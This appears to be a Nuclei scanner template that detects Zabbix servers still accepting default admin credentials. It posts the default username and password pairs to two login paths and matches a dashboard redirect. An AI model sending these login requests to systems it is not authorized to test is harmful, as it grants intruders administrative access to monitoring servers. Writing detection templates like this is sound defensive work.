id: zabbix-default-login

info:
  name: Zabbix Default Login
  author: pdteam
  severity: high
  description: Zabbix default admin credentials were discovered.
  tags: zabbix

requests:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        name={{username}}&password={{password}}&autologin=1&enter=Sign+in
      - |
        POST /zabbix/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        name={{username}}&password={{password}}&autologin=1&enter=Sign+in
    payloads:
      username:
        - Admin
        - zabbix
      password:
        - zabbix
        - zabbix
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "zabbix.php?action=dashboard.view"

      - type: status
        status:
          - 302
